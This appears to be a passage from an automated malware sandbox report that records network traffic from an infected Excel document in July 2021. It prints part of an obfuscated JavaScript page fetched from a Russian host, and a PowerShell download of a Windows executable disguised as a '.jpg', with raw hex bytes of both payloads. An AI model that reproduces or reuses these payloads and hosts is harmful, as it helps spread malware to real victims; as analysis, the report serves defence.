                                                                                                                                                  Jul 8, 2021 16:30:58.380610943 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.416707993 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.416785955 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.416913033 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.416939020 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417027950 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417084932 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417115927 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.417136908 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417190075 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417205095 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.417242050 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417292118 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417310953 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.417345047 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417397022 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417412043 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.417455912 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417510986 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417526960 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.417582989 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417639017 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417658091 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.417694092 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.417766094 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.418477058 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418606997 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418632984 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418648005 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.418725967 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.418761015 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455653906 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455688000 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455710888 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455730915 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455754995 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455775976 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455796003 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455815077 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455837011 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455856085 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455873966 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455878973 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455892086 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455910921 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455919981 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455926895 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455929995 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455933094 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455948114 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.455952883 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455969095 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.455986023 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456007004 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456024885 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456027031 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456073046 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456084013 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456089020 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456115007 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456135988 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456156969 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456180096 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456223965 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456248045 CEST80497488.211.241.0192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:58.456253052 CEST4974880192.168.2.38.211.241.0
                                                                                                                                                  Jul 8, 2021 16:30:58.456315041 CEST4974880192.168.2.38.211.241.0

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 8, 2021 16:29:53.564768076 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:53.578222990 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:54.178376913 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:54.192507982 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:54.824332952 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:54.838404894 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:55.835694075 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:55.848789930 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:56.741254091 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:56.755331039 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:57.480906010 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:57.497735023 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:29:59.299197912 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:29:59.313008070 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:00.503516912 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:00.516273975 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:01.344029903 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:01.356662989 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:08.551011086 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:08.612201929 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:08.898909092 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:08.937540054 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.381835938 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:09.690469027 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:09.912703991 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:09.927294016 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:13.134540081 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:13.147902012 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:14.911003113 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:14.924371958 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:15.634979010 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:15.648191929 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:16.993629932 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:17.006740093 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:18.653445959 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:18.667047024 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:19.314007044 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:19.327969074 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:21.062259912 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:21.078854084 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:21.765441895 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:21.778531075 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:21.855720043 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:21.870990038 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:30.737751961 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:30.759521961 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:49.591932058 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:49.628288031 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:52.060528994 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:52.076414108 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:55.887640953 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:55.906641960 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:30:57.862971067 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:30:58.155386925 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:27.690449953 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:27.718674898 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:41.349364996 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:41.383874893 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:44.151695967 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:44.173644066 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:52.775281906 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                  Jul 8, 2021 16:31:53.091214895 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                  Jul 8, 2021 16:31:53.451231003 CEST53639788.8.8.8192.168.2.3

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jul 8, 2021 16:30:09.381835938 CEST192.168.2.38.8.8.80xdd4dStandard query (0)srand04rf.ruA (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:30:57.862971067 CEST192.168.2.38.8.8.80x7e19Standard query (0)srand04rf.ruA (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.775281906 CEST192.168.2.38.8.8.80xdfcbStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:53.091214895 CEST192.168.2.38.8.8.80x6ae3Standard query (0)sudepallon.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jul 8, 2021 16:30:09.690469027 CEST8.8.8.8192.168.2.30xdd4dNo error (0)srand04rf.ru8.211.241.0A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:30:58.155386925 CEST8.8.8.8192.168.2.30x7e19No error (0)srand04rf.ru8.211.241.0A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.173.155A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.175.90A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.92.227A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.121.178A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.175.83A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.246.238A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.190.106A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:52.788335085 CEST8.8.8.8192.168.2.30xdfcbNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.226.23A (IP address)IN (0x0001)
                                                                                                                                                  Jul 8, 2021 16:31:53.451231003 CEST8.8.8.8192.168.2.30x6ae3No error (0)sudepallon.com77.222.42.67A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • srand04rf.ru
                                                                                                                                                  • api.ipify.org
                                                                                                                                                  • sudepallon.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.3497248.211.241.080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:30:09.727418900 CEST253OUTGET /92375234.xml HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Host: srand04rf.ru
                                                                                                                                                  Jul 8, 2021 16:30:09.811278105 CEST255INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:30:09 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 8419
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Last-Modified: Thu, 08 Jul 2021 14:19:40 GMT
                                                                                                                                                  ETag: "60e7097c-20e3"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 5f 30 78 38 63 38 36 20 3d 20 5b 0d 0a 20 20 20 20 27 57 36 52 63 55 48 48 4f 57 34 64 63 55 53 6f 63 79 5a 47 6a 27 2c 0d 0a 20 20 20 20 27 57 51 42 64 47 61 4f 37 57 50 71 5a 57 37 33 64 49 71 27 2c 0d 0a 20 20 20 20 27 57 34 70 63 4c 71 4b 67 79 43 6b 47 61 61 48 4a 57 36 4f 27 2c 0d 0a 20 20 20 20 27 57 34 68 63 4f 71 7a 42 6e 6d 6f 37 57 37 48 43 27 2c 0d 0a 20 20 20 20 27 62 57 46 63 56 57 6d 45 57 34 66 53 78 73 6c 64 55 53 6f 4b 57 50 57 27 2c 0d 0a 20 20 20 20 27 57 51 78 63 55 73 30 74 57 51 47 32 57 37 34 27 2c 0d 0a 20 20 20 20 27 79 66 43 31 57 36 42 63 50 65 66 37 57 36 6c 64 4a 64 75 27 2c 0d 0a 20 20 20 20 27 57 50 56 63 4a 53 6f 43 6e 48 79 75 57 52 4e 64 48 6d 6b 48 57 50 62 59 57 51 4b 27 2c 0d 0a 20 20 20 20 27 57 35 37 63 4b 43 6f 4b 69 43 6b 47 57 35 2f 63 50 5a 72 5a 6d 57 27 2c 0d 0a 20 20 20 20 27 57 51 78 64 48 78 7a 63 57 37 57 42 57 34 42 64 56 71 6e 76 57 50 6d 27 2c 0d 0a 20 20 20 20 27 57 35 4e 64 54 43 6b 6c 41 67 38 64 57 50 68 64 50 53 6b 30 57 52 39 4a 57 51 33 63 4c 53 6f 34 57 50 70 64 4e 32 4f 27 2c 0d 0a 20 20 20 20 27 7a 67 35 6a 57 37 30 2f 77 4a 31 65 57 34 6c 63 4f 4b 2f 63 48 47 27 2c 0d 0a 20 20 20 20 27 57 50 62 79 42 6d 6f 55 57 50 44 7a 6b 62 6c 63 4a 57 48 59 63 71 27 2c 0d 0a 20 20 20 20 27 57 37 6c 64 55 74 2f 63 4e 38 6b 64 57 50 4e 63 51 74 79 27 2c 0d 0a 20 20 20 20 27 61 61 68 64 48 75 54 48 57 50 39 44 71 47 27 2c 0d 0a 20 20 20 20 27 57 51 64 63 4d 62 69 38 57 4f 53 78 57 37 71 27 2c 0d 0a 20 20 20 20 27 57 37 69 51 6e 6d 6f 2b 44 43 6b 56 7a 53 6f 63 27 2c 0d 0a 20 20 20 20 27 57 35 57 48 72 76 4a 63 54 6d 6f 46 45 77 2f 63 52 53 6f 6c 63 6d 6f 35 6d 6d 6f 49 27 2c 0d 0a 20 20 20 20 27 6b 38 6f 66 65 6d 6b 61 57 35 50 62 7a 63 7a 4c 6c 63 58 51 27 2c 0d 0a 20 20 20 20 27 57 37 68 64 55 4d 70 64 48 43 6f 38 57 35 46 63 4b 48 71 71 79 65 39 4d 27 2c 0d 0a 20 20 20 20 27 61 38 6f 70 63 53 6b 6f 6e 43 6b 4f 72 71 27 2c 0d 0a 20 20 20 20 27 57 50 62 35 57 51 56 64 56 30 68 63 51 53 6b 37 57 35 38 27 2c 0d 0a 20 20 20 20 27 79 31 44 4c 57 52 78 63 4b 65 31 6f 57 36 61 27 2c 0d 0a 20 20 20 20 27 57 35 33 63 4b 53 6f 50 6b 38 6f 50 57 35 64 63 4c 64 7a 75 69 43 6b 2b 27 2c 0d 0a 20 20 20 20 27 57 34 38 64 78 38 6b 4e 57 50 56 64 49 58 7a 65 69 53 6f 44 57 36 52 64 4d 6d 6b 34 57 4f 5a 63 47 6d 6b 71 67 64 37 64 4b 43 6b 2f 57 52 37 63 4c 53 6f 51 57 52 4c 36 57 34 58 52 65 65 33 64 4b 6d 6f 70 69 4c 33 63 4d 4a 6d 35 69 43 6b 67 57 36 37 63 4d 4c 75 78 57 37 33 63 4d 72 6c 64 4e 43 6b 76 43 66 5a 64 4b 43 6f 35 7a 6d 6f 6c 57 35 74 63 4a 76 64 63 49 53 6f 4c 57 36 4f 4e 57 37 37 64 53 38 6b 34 74 6d 6f 65 6a 43 6b 45 42 43 6b 2b 61 71 4b 72 57 37 43 34 57 52 78 63 48 53 6b 34 63 6d 6f 63 70 59 47 2f 6d 38 6b 69 64 75 30 61 74 47 72 4f 74 43 6f 79 57 34 2f 63 47 6d 6f 69 57 35 42 63 51 43 6f 66 67 53 6f 68 57 36 42 63 4d 4c 78 64 54 30 42 64 56 4b 61 32 46 53 6f 71 57 37 2f 63 4f 38 6f 31 6b 53 6b 51 57 34 76 4c
                                                                                                                                                  Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><script language="javascript">var _0x8c86 = [ 'W6RcUHHOW4dcUSocyZGj', 'WQBdGaO7WPqZW73dIq', 'W4pcLqKgyCkGaaHJW6O', 'W4hcOqzBnmo7W7HC', 'bWFcVWmEW4fSxsldUSoKWPW', 'WQxcUs0tWQG2W74', 'yfC1W6BcPef7W6ldJdu', 'WPVcJSoCnHyuWRNdHmkHWPbYWQK', 'W57cKCoKiCkGW5/cPZrZmW', 'WQxdHxzcW7WBW4BdVqnvWPm', 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O', 'zg5jW70/wJ1eW4lcOK/cHG', 'WPbyBmoUWPDzkblcJWHYcq', 'W7ldUt/cN8kdWPNcQty', 'aahdHuTHWP9DqG', 'WQdcMbi8WOSxW7q', 'W7iQnmo+DCkVzSoc', 'W5WHrvJcTmoFEw/cRSolcmo5mmoI', 'k8ofemkaW5PbzczLlcXQ', 'W7hdUMpdHCo8W5FcKHqqye9M', 'a8opcSkonCkOrq', 'WPb5WQVdV0hcQSk7W58', 'y1DLWRxcKe1oW6a', 'W53cKSoPk8oPW5dcLdzuiCk+', 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tmoejCkEBCk+aqKrW7C4WRxcHSk4cmocpYG/m8kidu0atGrOtCoyW4/cGmoiW5BcQCofgSohW6BcMLxdT0BdVKa2FSoqW7/cO8o1kSkQW4vL


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.3497488.211.241.080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:30:58.213911057 CEST3578OUTGET /08.jpg HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                  Host: srand04rf.ru
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jul 8, 2021 16:30:58.378170967 CEST3580INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:30:58 GMT
                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                  Content-Length: 763392
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT
                                                                                                                                                  ETag: "60e5ade0-ba600"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 